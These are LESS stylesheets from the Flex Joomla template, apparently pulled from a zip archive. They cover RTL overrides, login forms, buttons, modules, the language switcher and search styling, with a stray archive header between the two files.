		.sp-simpleportfolio .sp-simpleportfolio-filter ul li .simple-divider {
		  float:right!important;
		  direction:rtl;
		}
		
		.sp-simpleportfolio .sp-simpleportfolio-filter > ul > li.no-margin:first-child > a  {
		  border-radius: 0 4px 4px 0;
		}
		.sp-simpleportfolio .sp-simpleportfolio-filter > ul > li.no-margin:last-child > a  {
		  border-radius: 4px 0 0 4px;
		}
		.sp-simpleportfolio-info .sp-simpleportfolio-tags {
			i.fa, i.fas, i.far {
			  margin-left:7px;
			  margin-right:0;
			}
		}

		
		/* ----- Scroll to Top ----- */
		a#scroll-top {
			left:-40px;
			right:auto;
		
			&.open {
				left:10px;
				right:auto;
			}
		
		}
		
		
	// Login, Registration, Reset, Remind
	.login-wrapper,
	.registration-wrapper,
	.reset-wrapper,
	.remind-wrapper {
		
		>i {
			&.pe {
				left:auto;
				right:2vw;

			}
		}
	}

	.login-wrapper {
		
		.form-group {
			
			>button.btn {
				float:right;
			}
			.form-links {
				direction:rtl;
				float:right;
				text-align:right;
				display:table;
				width:auto;
				margin-top:3px;
				>a {
					display:table-cell;
					padding:0 5px;
					
				}
			}
			
		}
		.form-footer {
			display:inline-table;
			direction:rtl;
			clear:both;
			width:100%;
			
			>a {
				display:inline-table;
				padding:0 5px;
			
				
			}
		}
		
		>i {
			&.pe {
				right:8vw;
				left:auto;
			}
		}
	}
	.remind-wrapper { 
		>i {
			&.pe {
		
				right:2vw;
				left:auto;
			}
		}
	}
	.reset-wrapper{ 
		>i {
			&.pe {
				right:7vw;
				left:auto;
			}
		}
	}

		
	// Modal Login
	.ap-modal-login{
		margin:0;
		.title{
			float:right;
			i.pe {
				margin:-1px 0 0 8px;
			}
		}

		.modal-content{
			.modal-body{
				.button-wrap{
					float:right!important;
					margin-right:0;
					
				}
				
				.remember-wrap{
					float:right;
					text-align: right;
					margin-right:0;
				}
				
				
				.forget-name-link{
					float:right!important;
					margin-right: 10px;
					padding-top:3px;
					text-align:right;
					display:table;
					>a {
						display:table-cell;
						padding:0 5px;
						
					}
				}
			}
		}
		.modal-header{
			.title{
				text-align: right;
			}
			.close{
				left: 10px;
				right:auto;
			
			}
		}

	}
	
		.sp-contact-info {
			float:right;
		}
		
		.ap-my-account-menu{
	
			.signin-img-wrap{
				float: right;
				
				i {
					&.pe {
						margin:1px 4px 0;
					}
				}
			}
			.info-wrap{
				display:inline-block;
				margin: 0 8px;
				line-height:22px;
				.info-text {
					font-size:14px;
				}
			}
			.dropdown-menu { 
				margin-top:8px;
			}
		}	
	
 	}
}

// Coming Soon				
.sp-comingsoon {

	body {

		a.logo {
	
				img.sp-default-logo {
					text-align:center;
					margin:0 auto;
					

				}
				div.backhome {
					display:none;
				}
				
		
		
			&:hover {
				img.sp-default-logo {
					margin:0 auto;
				}
				
			}

		}
	}
}

/* Edit Article (added from Flex 2.7, for Joomla 3.8) */
.edit-article {
	margin:0 10px 0 0!important;
	float:left!important;
	.btn-group {
		float:left!important;
	}
}

@media (min-width: @screen-sm-min) and (max-width: @screen-md-min){
	
	#vmCartModule {
		display:inline-block;
		float:none;
		margin:0;
		left:0;
		right:auto;
		text-align:center;
		
	}
	
}

@media (max-width: @screen-sm-min) {
	#vmCartModule {

		margin-left:0;
		margin-right:0;
		left:0;
		right:auto;
		width:60px;
		text-align:center;
		
	}
	//Top search
		.top-search-wrapper{
			left:30px;
			right:auto;
		}
		
		.top-search-input-wrap{
		
			.top-search-wrap {
				left:5vw;
				right:auto;
			}
		}
		
		.centered, .addspace {
			.top-search-wrap {
				left:-20vw;
				right:auto;			
			}
		}
	
	  
	  	header.centered, header.addspace  {
			  #cart-menu,
	  		  .cd-cart {
			   >i {
				  width:100px;
				  padding-left:17px;
			  }
			}
			#offcanvas-toggler {
				float:right!important;
				left:auto;
				right:0!important;
				position:absolute!important;
				z-index:3;
				
			}
		}
	
		.sticky-wrapper { 
		
			&.is-sticky {
		
				/* All headers */
				#sp-header {	
					.cd-cart {
						  >i {
							 font-size:30px;
							 padding-left:32px; 
							 float:right;  
						  }
						  .total_products {
							height: 18px;
							width: 18px;
							line-height: 18px;
							top: 8px;
							right:1px;
							
						  }
					}
				}
			}
		}
		
	.sppb-addon-image-content {
		.col-sm-6, .col-xs-12 {
			right:0;
			left:0;
		}
	}
			
}
@media (max-width: @screen-xs-min) {
	// Timeline
	.sppb-addon-timeline {
		.sppb-addon-timeline-wrapper {
			.odd {
				.timeline-item {
					.timeline-panel {
						&:before {
							top: -5px!important;		   
						}			
					}
				}
			}
		}
	}
}


	/* Animations for "Animated Headlines" Addon */
	// Push
	@-webkit-keyframes push-in {
	  0% {
		opacity: 0;
		-webkit-transform: translateX(150%);
	  }
	  65% {
		opacity: 1;
		-webkit-transform: translateX(-10%);
	  }
	  100% {
		opacity: 1;
		-webkit-transform: translateX(0);
	  }
	}
	@keyframes push-in {
	  0% {
		opacity: 0;
		-webkit-transform: translateX(150%);
		-moz-transform: translateX(-150%);
		-ms-transform: translateX(-150%);
		-o-transform: translateX(-150%);
		transform: translateX(150%);
	  }
	  65% {
		opacity: 1;
		-webkit-transform: translateX(-10%);
		-moz-transform: translateX(10%);
		-ms-transform: translateX(10%);
		-o-transform: translateX(10%);
		transform: translateX(-10%);
	  }
	  100% {
		opacity: 1;
		-webkit-transform: translateX(0);
		-moz-transform: translateX(0);
		-ms-transform: translateX(0);
		-o-transform: translateX(0);
		transform: translateX(0);
	  }
	}
	@-webkit-keyframes push-out {
	  0% {
		opacity: 1;
		-webkit-transform: translateX(0);
	  }
	  
	  100% {
		opacity: 0;
		-webkit-transform: translateX(-150%);
	  }
	}
	@keyframes push-out {
	  0% {
		opacity: 1;
		-webkit-transform: translateX(0);
		-moz-transform: translateX(0);
		-ms-transform: translateX(0);
		-o-transform: translateX(0);
		transform: translateX(0);
	  }
	
	  100% {
		opacity: 0;
		-webkit-transform: translateX(-150%);
		-moz-transform: translateX(150%);
		-ms-transform: translateX(150%);
		-o-transform: translateX(150%);
		transform: translateX(-150%);
	  }
	}PK!*Y�7�7flex/less/theme.lessnu&1i�/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

/*=======================================*
 *======= 	TABLE OF CONTENT	 ========*
 *=======================================*

	01. Base Style	
	01. Button & Input
	03. Top Bar
	04. Header
	05. Page Title
	06. body innerwrapper
	07. Page Builder Addons
	08. Module
	09. Search
	10. Blog
	11. Bottom
	12. Footer
	13. Comingsoon
	14. Error page
	15. Mixed CSS
	16. Login

=======================================*/


/*=========================================
 *======= 	 Start Base Style	   ============
 *=======================================*/
a {
	-webkit-transition: color 200ms, background-color 350ms;
	transition: color 200ms, background-color 350ms;
}
* {
	-webkit-font-smoothing: subpixel-antialiased; /* fix for Safari font-weight */
	-webkit-text-stroke:1px transparent;
}
body {
	line-height: 25px;
}

a,
a:hover,
a:focus,
a:active {
	text-decoration: none;
	outline: 0;
}
a,button,input,.btn,.sppb-btn {
	outline: 0!important;
}
label {
	font-weight: normal;
}

legend {
	padding-bottom: 10px;
}

img {
	display: block;
	max-width: 100%;
	height: auto;
}
.floatcenter {
	margin-left:auto;
	margin-right:auto;
	text-align:center;
}

.full-window {
	min-height:100vh;
	//padding:50vh 0px;
	position:absolute;
	top:0;
	left:0;
	right:0;
	bottom:0;
}


.sticky-bottom {
	position:absolute;
	left:0;
	right:0;
	bottom:0;
	z-index:1;
}


/*End Base Style
*=======================================*/


/*=========================================
 *======= 	 Start Button	   ============
 *=======================================*/
.btn, .sppb-btn-rounded {border-radius: 4px;}
.sppb-btn {font-size:100%;line-height:1.4;} /* reset font size for sppb buttons */
.btn,
.sppb-btn {
	.transition(~'color 400ms, background-color 400ms, border-color 400ms');
	padding:8px 28px;
	margin-right:3px;
	border: 1px solid transparent;
	outline:0;
		
	&.sppb-btn-outline{
	  padding:8px 30px;
	}
	&.sppb-btn-round {
		line-height:1.5;
		padding:8px 26px 9px;
	}
	&.sppb-btn-3d {
		padding:10px 30px 11px;
		-webkit-box-shadow: inset 0 -4px 0 rgba(0,0,0,.25), inset 0 0 0 1px rgba(0,0,0,.1);
		box-shadow: inset 0 -4px 0 rgba(0,0,0,.25), inset 0 0 0 1px rgba(0,0,0,.1);
		outline:0;
		border:0;
		-webkit-transform: translateY(0) scale(1) perspective(1000px) rotateX(5deg) rotateY(0) translateZ(1%);
		-moz-transform: translateY(0) scale(1) perspective(1000px) rotateX(5deg);
		-ms-transform: translateY(0) scale(1) perspective(1000px) rotateX(5deg);
		-o-transform: translateY(0) scale(1) perspective(1000px) rotateX(5deg);
		transform: translateY(0) scale(1) perspective(1000px) rotateX(5deg) rotateY(0) translateZ(1%);
		.transition(all 0.1s ease);	
		
		&.focus,
		&.active,
		&:active,
		&:focus {
			outline:0;
			border:0;
			-webkit-box-shadow: inset 0 -2px 0 rgba(0,0,0,.25), inset 0 1px 0 rgba(0,0,0,.1), inset 0 0 0 1px rgba(0,0,0,.1);
			box-shadow: inset 0 -2px 0 rgba(0,0,0,.25), inset 0 1px 0 rgba(0,0,0,.1), inset 0 0 0 1px rgba(0,0,0,.1);
			-webkit-transform: translateY(1px) scale(0.99) perspective(800px) rotateX(-5deg);
			-moz-transform: translateY(1px) scale(0.99) perspective(800px) rotateX(-5deg);
			-ms-transform: translateY(1px) scale(0.99) perspective(800px) rotateX(-5deg);
			-o-transform: translateY(1px) scale(0.99) perspective(800px) rotateX(-5deg);
			transform: translateY(1px) scale(0.99) perspective(800px) rotateX(0);
		}
		
		&.sppb-btn-lg {
			padding:10px 34px 13px;
		}
	  
	}

	&.sppb-selector,
	&.sppb-modal-selector {
		i {
			&.fa {
				margin:0 5px 0 0;
			}
			&.fas, &.far {
				margin:0 5px 0 0;
			}
			&.pe {
				margin:0 7px 0 -2px;
				line-height:1.1;
				font-size:115%;
				text-align:center;
				vertical-align:middle;
			}
		}
	}
	
	&.bold {
		i {
			&.pe {
				font-weight:600;
			}
		}
	}
	&.sppb-btn-xs {
		line-height:1.1;
		padding:5px 16px;
		font-size:80%;
	}
	&.sppb-btn-sm {		
		padding:6px 22px;
		font-size:87%;
	}
	&.sppb-btn-lg {
		line-height:1.7;
		font-size:125%;
		padding:9px 30px;
	}
	&.btn-light {
		i {
			line-height:1.3;
			margin-right:6px;
			&.pe {
				font-size:130%;
				vertical-align:middle;
				line-height:1.4;
				margin-right:7px;
				&.bold {
					font-weight:600;
				}
			}
		}
	}
	&.responsive {
		white-space: normal;
		text-align:center;
		display:table;
	}
	&.sppb-btn-link {
		border:0;
		padding-left: 20px;
		padding-right: 20px;
	}
}

.btn-readmore {
	margin:10px auto;
	padding:8px 30px;
}
.button {
	outline:none;
	border-radius:4px;
	border:none;
	margin:20px 10px;
	/*display:inline-block;*/
}


//Offline page

.offline-container {
	.row-fluid {
		.flexbox();
		.flex-align-items();
		.flex-justify-content(center);
		height:100vh;
	
	
		> div {
			.flex-align-items();
			.flex-justify-content(center);
		}
	}
}

.offline-inner {
	background:rgba(255,255,255,0.8);
	margin:0 auto;
	padding:3%;
	border-radius:4px;
	
	.offline_message {
		.flexbox();
		.flex-align-items();
		.flex-justify-content(center);
		margin:10px auto;
		padding:3vh;
	}
	.outline > .centered-logo{
		.flexbox();
		.flex-align-items();
		.flex-justify-content(center);
		margin:0 auto;
	}
	.outline {
		
		h1 {
			font-weight:300;
			color: #777;
			text-shadow: 1px 1px 2px gba(255,255,255,0.85);
		}
		
		#form-login {
			display:table;
			margin:10px auto 20px;
			text-align:center;
			width:320px;
		
			#submit-buton {
				margin:0;
				text-align:left;
				
				.btn-readmore.login {
					border-color: darken(@major_color, 2%);
					background-color: @major_color;
					background-color: fade(@major_color, 90%);
					color:#fff;
				
					&:hover,
					&:focus {
						border-color: darken(@major_color, 15%);
						background-color: darken(@major_color, 4%);
						color:#fff;
					}
				}
			}
			> div {
				margin:10px auto;
			}
			input.form-control {
				background-color:rgba(255,255,255,0.85);
				line-height:32px;
				height:42px;
			}
		}
	}
	
	hr {
		border-color:rgba(255,255,255,.8);
		box-shadow:0 -1px 0px rgba(0,0,0,0.1);
		margin-bottom:25px;
	}

	.sp-comingsoon-content {
		margin: 10px auto;
		clear:both;
		font-size: 26px;
		font-weight: 300;
		display:block;
		width:100%;
		text-align:center;
	}
	
	.sp-comingsoon-countdown {
		.flexbox();
		.flex-align-items();
		.flex-justify-content(center);
		padding:0 10%;
		
		.days,
		.hours,
		.minutes,
		.seconds{
			
			width: 22%;
			background-color: rgba(30,30,30,0.1);
			margin: 10px auto;
			box-shadow:none;
			padding:10px;
			border-radius:3px;
		}
	
		.days .number,
		.hours .number,
		.seconds .number,
		.minutes .number{
			min-width:50%;
			height: 45px;
			line-height: 45px;
			display: table;
			margin: 10px auto;
			text-align:center;
			font-size: 45px;
			font-weight: 300;	
		}
	
		.days .string,
		.minutes .string,
		.seconds .string,
		.hours .string{
			.flexbox();
			.flex-align-items();
			.flex-justify-content(center);
			font-size: 16px;
			color:#777;
			margin: 10px auto 5px;
		}
	}
}


//input
select, textarea, input[type="text"], input[type="password"], input[type="datetime"], input[type="datetime-local"], input[type="date"], input[type="month"], input[type="time"], input[type="week"], input[type="number"], input[type="email"], input[type="url"], input[type="search"], input[type="tel"], input[type="color"], .uneditable-input {
    .form-control();
}

.group-control {
    select, textarea, input[type="text"], input[type="password"], input[type="datetime"], input[type="datetime-local"], input[type="date"], input[type="month"], input[type="time"], input[type="week"], input[type="number"], input[type="email"], input[type="url"], input[type="search"], input[type="tel"], input[type="color"], .uneditable-input {
        width: 100%;
    }
}

// for all inputs
input {
	transition: all .3s ease-in-out;
	-webkit-transition: all .3s ease-in-out;
    -moz-transition: all .3s ease-in-out;
    -o-transition: all .3s ease-in-out;
	&:focus {
		box-shadow:none!important;
	}
}

.group-control {
  select,
  textarea,
  input[type="text"],
  input[type="password"],
  input[type="datetime"],
  input[type="datetime-local"],
  input[type="date"],
  input[type="month"],
  input[type="time"],
  input[type="week"],
  input[type="number"],
  input[type="email"],
  input[type="url"],
  input[type="search"],
  input[type="tel"],
  input[type="color"],
  .uneditable-input {
    width: 100%;
  }
}

/* Some "Custom" Classes */
.pull-left {
	margin-right:20px;
	margin-bottom:3px;
}
.pull-center {
	margin:0 auto 10px;
	text-align:center;
}
.pull-right {
	margin-left:20px;
	margin-bottom:3px;
}
.float-left {
	float:left;
}
.float-center {
	float:none;
	margin:0 auto;
	text-align:center;
}
.float-right {
	float:right;
}

.svgwhite {
		background: url(../images/svgwhite.svg) center center repeat;
}
.shadow {
   box-shadow:-25px 0 30px -15px rgba(0,0,0,.15),25px 0 30px -15px rgba(0,0,0,.15);
}
.text-shadow {
	text-shadow: 1px 1px 2px rgba(0,0,0,.2);
	.sppb-cta-title {
		text-shadow: 1px 1px 2px rgba(0,0,0,.2);
	}
}
.border-radius {
   border-radius:5px;	
}
		
.padding30 {
	padding:0 30px;
}


/*=========================================
*======= 	Start  Top Bar	   ============
*=======================================*/
#sp-top-bar {
	
	.sp-module {
		display:inline-block;
		margin-top:0;
		margin-bottom:0;

		.modal-login-wrapper {
			display: inline-block;
		}
	}
 
}


ul.social-icons {
	list-style: none;
	padding: 0;
	margin: 0;
	display: inline-block;
	>li {
		display: inline-block;
		margin: 0 7px;
		a {
			color: #999999;
		}
	}
}

// Language switcher
.sp-module-content {
	
	.mod-languages {

		.dropdown-toggle {
			display:block;
			padding:3px 10px 3px 14px;
			broder:none;
			box-shadow:1px 0 0 0px rgba(196,196,196,0.15), -1px 0 0 0px rgba(196,196,196,0.15);
			line-height:1;
			img {
				display:inline-block;
				padding:0 7px 0 0;
				margin-top:-2px;
				
			}
			>i {
				padding:0 0 0 4px;
				width:16px;
				line-height:14px;
				vertical-align:middle;
			}		
		}
		
		.dropdown-menu {
			background-color:rgba(60,60,60,0.87);
			border-radius: 0 0 5px 5px;
			margin-top:9px;
			
			li {
				 box-shadow:none;
				 border:none;
				a {
					padding:2px 14px;
					.flexbox();
					.flex-align-items();
					box-shadow:none;
					border:none;
					border-bottom:1px solid rgba(157,157,157,0.25);
										  
  
					img {
						vertical-align:middle;
						float:left;
						display:flex;
						padding:0 8px 0 0;
						
					}
					&:hover {
						color:#fff;
						background-color:rgba(0,0,0,0.1);
					}
				}	
				
				
				&:last-child {
					a {
					  border-bottom:none;
					}
				}
			}
		}
		
		
		ul.lang-inline {
			margin: 0;
			padding: 0 10px;
			border-left:1px solid rgba(129,129,129,0.4);
			border-right:1px solid rgba(129,129,129,0.4);

			li {
				border: none;
				display: inline-block;
				margin: 0 5px 0 0;

				a {
					padding: 0!important;
				}

				>a:before {
					display: none;
				}
				&:last-child {
					margin-right:0;
				}
			}
		}
		ul.lang-block.vertical {
			margin: 0;
			padding: 0;
			display: block;

			li {
				border: none;
				margin:8px 0 0 0;
				padding:0;
				display:table;
				text-align:left;

				a {
					float:left;
					display:block;
					padding: 0;
					line-height:1.5;

					img {
						float:left;
						direction:ltr;
						text-align:left;
						display:inline;
						margin:0;
				        padding:4px 8px 0 0;
					}
					span {
						font-size:90%;
						float:left;
						
					}

				}
				&.lang-active {
					a {
						i {
							padding:0px 0 0 6px;
							margin-top:3px;
							line-height:15px;
							font-size:80%;
							color:lighten(@major_color, 20%);
							vertical-align:top;
							opacity:0.7;
						}
					}
				}
				>a:before {
					display: none;
				}
			}
		}
	}
}


.signature {
  position: relative;
  overflow: auto;
  width: 100%;
  height: 0;
  padding-bottom: 55.30973%;
}
.signature svg {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
}


.sp-contact-info {
	float: left;
	list-style: none;
	padding: 0;
	margin: 0 10px 0 0;
	li {
		display: inline-block;
		margin: 0 7px;
		font-size: 90%;
		
		i{
			margin: 0 3px;
			&.pe {
				font-size:125%;
				line-height:1;
				margin-top:-2px;
				vertical-align:middle;
			}
		}
		span[id*="cloak"] {
			text-indent: -9999em; // hiding info
		}
	}
}
/* End  Top Bar
*=======================================*/

#sp-logo-centered {
	#sp-logo, #sp-logo div h1, #sp-logo div a {
		.flexbox();
		.flex-align-items();
		.flex-justify-content(center);
		margin: 0 auto;
		padding:0;
		/*
		img {
			margin: 2vh 0;
		}
		*/
	}	
}
#sp-addspace-logo {

	.sp-column, #sp-addspace div {
		.flexbox();
		.flex-align-items();
	}
	
	#sp-logo {
		
		> div {
			.flexbox();
			.flex-align-items();
			
		}
	}		
}

ol.breadcrumb{
	background:transparent;
	padding:0;
	margin-:0;
	list-style:none;
	border-radius:4px;
	
		> li{
			display:inline;
			
			+ li:before,img{
				display:none;
			}
			
			.text_separator {
				padding:0 5px;
				display:inline;
			}
			.breadcrumb_divider {
				padding:0 6px;
				vertical-align:middle;
				color:#ccc;
			}
		}
}



/*=========================================
*======= 	Start  Page Title   ============
*=======================================*/
#sp-title {
	min-height: 0;
}

// Page Title
.sp-page-title-no-img {
	background-color: #999;
}

.sp-page-title, .sp-page-title-no-img {
	.flexbox();
	.flex-align-items();
	background-repeat: no-repeat;
	background-position: 50% 50%;
	background-size: cover;
	background-attachment: fixed;
	box-shadow: inset 0 -10px 40px -10px rgba(0,0,0,.1), inset 0 10px 10px -8px rgba(0,0,0,.2);
	backface-visibility: hidden;
	
	.container {
	
		
		h1 {
			font-weight:300;
		}
		
		h1,h2,h3 {
			margin: 0;
			padding: 0;
			color: #fff;
			text-shadow:1px 2px 5px rgba(0,0,0,0.2);
		}
	
		h1, h2 {
			font-size: 32px;
			line-height: 1;
		}
	
		h3 {
			font-size: 14px;
			font-weight: normal;
			line-height: 1;
			margin-top: 10px;
		}
	
		.breadcrumb {
			background: none;
			padding: 0;
			margin: 10px 0 0 0;
			>.active {
				color: rgba(255, 255, 255, 0.8);
			}
	
			>span,
			>li,
			>li+li:before,
			>li>a {
				color: #fff;
			}
		}
	}
}

.body-wrapper{ 
	//min-height: 100%;
}

/*=========================================
 *===  Start body innerwrapper	 =====
 *=======================================*/

.body-innerwrapper{
	//display:block;
	//.flexbox();
	//min-height: 100vh;
	//flex-direction: column;
	//-webkit-transition: margin-left 400ms cubic-bezier(0.7,0,0.3,1);
	//transition: margin-left 400ms cubic-bezier(0.7,0,0.3,1);
	overflow-x: hidden;
}

// Boxed Layout
.layout-boxed {

	.body-innerwrapper {
		max-width: 1170px;
		margin-left:auto;
		margin-right:auto;
		//-webkit-overflow-scrolling: touch;
		
		header.centered, header.centered > .container-fluid {
			width:100%;
		}
		
		.sp-page-title {
			padding-left: 20px;
		}
		
		#sp-left.container-fluid, #sp-right.container-fluid {
			padding:0 15px 0 15px!important;
		}
	}
	
	.no-padding {
		padding-left:0;
		padding-right:0;
	}
	
}



#sp-main-body {
	padding: 50px 0;
}

.com-sppagebuilder {
	#sp-main-body {
		padding:0;
		
		.sppb-section {
			
			backface-visibility: hidden;
			 
			 > .sppb-row {
				 padding:0;
				 
				 .sppb-addon-container {
					 padding:0;
				 }
			 }
		}
		
		#sp-left {
			padding:0 0 0 40px;
			margin-right:-15px;
		}
		#sp-right {
			padding:0 40px 0 0;
			margin-left:-15px;
		}
		
	}
}

/* End body innerwrapper
*=======================================*/


/*=========================================
*======= 	Start  Module	   ============
*=======================================*/

.sp-column .sp-lr { /* Only for left and right modules (.sp-lr) */
	.sp-module {
		margin-top: 40px;
		
		&:first-child {
			margin-top: 0;
		}
	}
}
.sp-module, .sppb-addon-module {
		
	&:first-child {
		margin-top: 0;
	}
	.sp-module-title {
		margin: 0 0 20px;
		font-size:140%;
		line-height: 1.2;
		width:auto;
		padding-right:30px;
		box-shadow: inset 0 -1px 0 #ddd;
		display:table;

		&:after{
			clear: both;
			display:block;
			float:left;
			content:"";
			position:relative;
			height:2px;
			width:70%;
			margin:10px 30% 0 0;
			border-radius:2px;
			padding: 0;
		}
	
	}
		
	//Un-ordered List
	ul {
		list-style: none;
		padding: 0;
		margin: 0;
		>li {
			display: block;
			border-bottom: 1px solid #e8e8e8;
			-webkit-transition: 300ms;
			transition: 300ms;
			>a {
				display: block;
				padding: 5px 0;
				line-height: 36px;
				padding: 2px 0;
				-webkit-transition: 300ms;
				transition: 300ms;

				&:hover {
					background: none;
				}
			}

			&:last-child {
				border-bottom: none;
			}
		}
	}

	//List category
	.categories-module {
		ul {
			margin: 0 10px;
		}
	}
	
	//Articles-category module
	ul.category-module {
		>li {
			padding-bottom: 10px;
			margin-bottom: 7px;
			a.mod-articles-category-title {
				line-height:1.5;
				>i {
					font-size:87%;
					opacity:0;
					margin-left:-2px;
					.transition(300ms);
				}
				&:hover {
					>i {
						opacity:1;
						margin-left:5px;
					}	
				}
			}
			span {
				margin:0 7px 0 0;
				padding:0;
				display:inline-table;
				font-size:85%;
				color:#888;
				line-height:1;
				>i {
					margin:0 3px 0 0;
					font-size:90%;
					line-height:1.33;
					vertical-align:top;
				}
			}
			p {
				margin:5px auto 0;
				font-size:90%;
				color:#888;
				line-height:1.5;
				.fa-quote-left {
					margin:0 5px 0 0;
					font-size:90%;
				}
				.fa-quote-right {
					margin:0 0 0 5px;
					font-size:90%;
				}
			}
		}
	}

	//Latest Articles (module)
	.latest-articles{
		display:block;
		width:100%;
		a{
			float: left;
			color: #707070;
			width:100%;
			clear:both;
			font-size: 14px;
			line-height: 1.57;
			padding: 5px 0;
			.flexbox();
			.flex-align-items();
			.flex-justify-content(center);
			
			.article-list-img{
				float: left;
				margin: 0 15px 0 0;
				width:50px;
				.transition(all .3s ease-in-out);
				
				.overlay {						
					position:absolute;
					.transition(all .3s ease);
					width: 50px;
					height: 50px;
					box-shadow: none;
					border-radius: 2px;					
				}
					
				img{
					width: 50px;
					height: 50px;
					object-fit: cover;
					border-radius: 2px;				
					
				}
				
			}
			.latest-articles-title {
				width:70%;
				margin: 10px 0;		
				font-size: 14px;
				line-height: 1.57;
			}
			.date {
				float: left;
				display:block;
				margin: 0 15px 0 0;
				width:50px;
				text-align:center;
				background:rgba(155,155,155,0.1);
				border-radius: 2px;
				color:#777;
				border:1px solid rgba(95,95,95,0.12);
				.transition(all .3s ease-in-out);
				
				
				.year {
					font-size:15px;
					line-height:27px;
					color:#999;
				}

				small {
					font-size:11px;
					line-height:15px;
					display:block;
					clear:both;
					margin:5px auto 0;
					color:#777;
				}
			}
			
			&:hover,
			&:focus{
				color: #444;
				
				.overlay {	
					box-shadow: inset 0 0 0 2px rgba(55,55,55,0.25);							
				}
				
				.date {
					border:1px solid rgba(95,95,95,0.35);
					
					.year {
						color:#888;
					}
	
					small {
						color:#666;
					}
				}
			}
		}
	}


	//Tags Cloud
	.tagscloud {
		margin: -2px 0;
		.tag-name {
			display: inline-block;
			padding: 4px 10px;
			font-size:85%;
			color: #fff;
			border:1px solid #ccc;
			border-radius: 4px;
			margin: 3px 0 3px 2px;

			span {
				display: inline-block;
				min-width: 8px;
				margin:0 -1px 0 3px;
				padding: 3px 7px;
				font-size: 11px;
				font-weight: 700;
				line-height: 1.3;
				text-align: center;
				white-space: nowrap;
				vertical-align: baseline;
				background-color: rgba(0, 0, 0, 0.12);
				border-radius: 10px;
			}
		}	
	}
}

//Related Articles (left/right modules)
#sp-left, #sp-right {
	.relateditems {
		.relateditem {
			width:100%;
			padding-bottom: 4px;
			margin-bottom: 4px;
			border-bottom: 1px solid #f2f2f2;

			&:last-child {
				padding-bottom: 0;
				margin-bottom: 0;
				border-bottom: 0;
			}
			>a {
				display: block;
				font-weight: 400;
				line-height:1.5;
				padding: 2px;
				margin:7px auto;
				background:transparent;
				
				.article-list-img{
					float: left;
					margin: 0 10px 0 0;
					width:60px;
					
					img{
						width: 60px;
						height: 60px;
						object-fit: cover;
						border-radius: 2px;		
					}
				}
				
				.related-articles-title {
					font-size:95%;
				}
				
				>i.fa, >i.fas, >i.far {
					font-size:90%;
					line-height:12px;
					color:#888;
					width:16px;
					margin-right:0;
					text-align:center;
				}
				.related_date {
					display: block;
					margin: 1px 0 0 0;
					font-size:85%;
					color:#888;
					>i {
						color:#bbb;
						width:16px;
						margin-right:3px;
						text-align:center;
					}
				}
			}
		}
	}
}

//Related Articles (module)
.relateditems{
	display:block;
	
		.relateditem {
			padding:0 10px;
			
		a{
			float: left;
			color: #707070;
			background:#f6f6f6;
			width:100%;
			clear:both;
			font-size: 14px;
			line-height: 1.57;
			padding: 10px;
			margin:10px auto;
			border-radius: 3px;	
			
			.article-list-img{
				float: left;
				margin: 0 15px 0 0;
				width:100px;
				.transition(all .3s ease-in-out);
				
				.overlay {						
					position:absolute;
					.transition(all .3s ease);
					width: 100px;
					height: 80px;
					box-shadow: none;
					border-radius: 2px;	
					background:transparent;			
				}
					
				img{
					width: 100px;
					height: 80px;
					object-fit: cover;
					border-radius: 2px;		
				}
				
			}
			.related-articles-title {
				font-size:100%;
				display:block;
				margin: 0 0 10px;		
				font-size: 15px;
				line-height: 1.57;
				font-weight:bold;
			}
			
			.related_date {
				margin: 10px 15px 0 0;
				color:#777;
				font-size:90%;
			}
			
			&:hover,
			&:focus{
				color: #444;
				background:#e9e9e9;
				
				.article-list-img{
					filter:brightness(109%);
					background:rgba(0,0,0,.1);	
				}
				
			}
		}
	}
}


//Top search
.top-search-wrapper{
	position:relative;
	line-height: 32px;
	width:42px;
	z-index:3;
	.transition(color 0.3s ease-in-out);
	
	.icon-top-wrapper{
		cursor: pointer;

		i.fa, i.fas, i.far {
			font-size:15px;
			text-align:center;
			width:42px;
			margin:0 auto;
		}
		i.pe {
			font-size:18px;
			text-align:center;
			font-weight:bold;
			width:42px;
			margin:0 auto;
		}
		.search-close-icon{
			display: none;
		}
		.search-close-icon.open{
			display:block;
		}
		i.pe.search-close-icon.open {
			font-size:22px;
		}
		.search-close-icon,
		.search-open-icon {
			width:42px;
			text-align:center;
			line-height:32px;
		}
	}
}
 
.top-search-input-wrap{
	display: none;
	-webkit-backface-visibility: hidden;
	backface-visibility: hidden;
	
	.top-search-wrap {
		position:absolute;
		right:-10px;
		left:auto;
		float:left;
		width:360px;
		margin:-20px 0 0 0;
		z-index:8;
		-webkit-backface-visibility: hidden;
		backface-visibility: hidden;
		-webkit-transform: translateY(-20px) scale(0.85) perspective(500px) rotateX(90deg);
		-moz-transform: translateY(-20px) scale(0.85) perspective(500px) rotateX(90deg);
		-ms-transform: translateY(-20px) scale(0.85) perspective(500px) rotateX(90deg);
		-o-transform: translateY(-20px) scale(0.85) perspective(500px) rotateX(90deg);
		transform: translateY(-20px) scale(0.85) perspective(500px) rotateX(90deg);
		.transition(all 0.3s cubic-bezier(0.405, 0.020, 0.325, 0.950));
		opacity:0;
		
		.searchwrapper{
			background-color: rgba(255, 255, 255, 0.95);		
			padding: 8px 0;
			border-radius: 3px;
			margin-top:-1px;
		}
		  	  
		.sp_search_input{
			width:360px;
			 input{
				background-color: transparent;
				width: 100%;
				height: auto;
				font-size: 18px;
				font-weight: 600;
				border: 0;
				box-shadow:none;
				text-align: center;
			 }
		}
		&.active {	
			margin-top:1vh;
			-webkit-transform: translateY(0) scale(1) perspective(1000px) rotateX(0deg);
			-moz-transform: translateY(0) scale(1) perspective(1000px) rotateX(0deg);
			-ms-transform: translateY(0) scale(1) perspective(1000px) rotateX(0deg);
			-o-transform: translateY(0) scale(1) perspective(1000px) rotateX(0deg);
			transform: translateY(0) scale(1) perspective(1000px) rotateX(0deg);
			opacity:1;
		}
	}
}

/*=========================================
*======= 	Smart  Search	   ============
*=======================================*/
.finder{
	.form-search {
		.flex-search {
			position:relative;
			.search-query {
				width:100%;
			}
			&:before {
				position:absolute;
			}
		}
		.finder-selects {
			.advancedSelect {
				width:100%;
			}
		}
	}
}
.search-pages-counter {
	margin:20px auto!important;
	padding:10px 25px;
	display:table;
	border:1px solid #ddd;
	border-radius: 4px;
}
/*=========================================
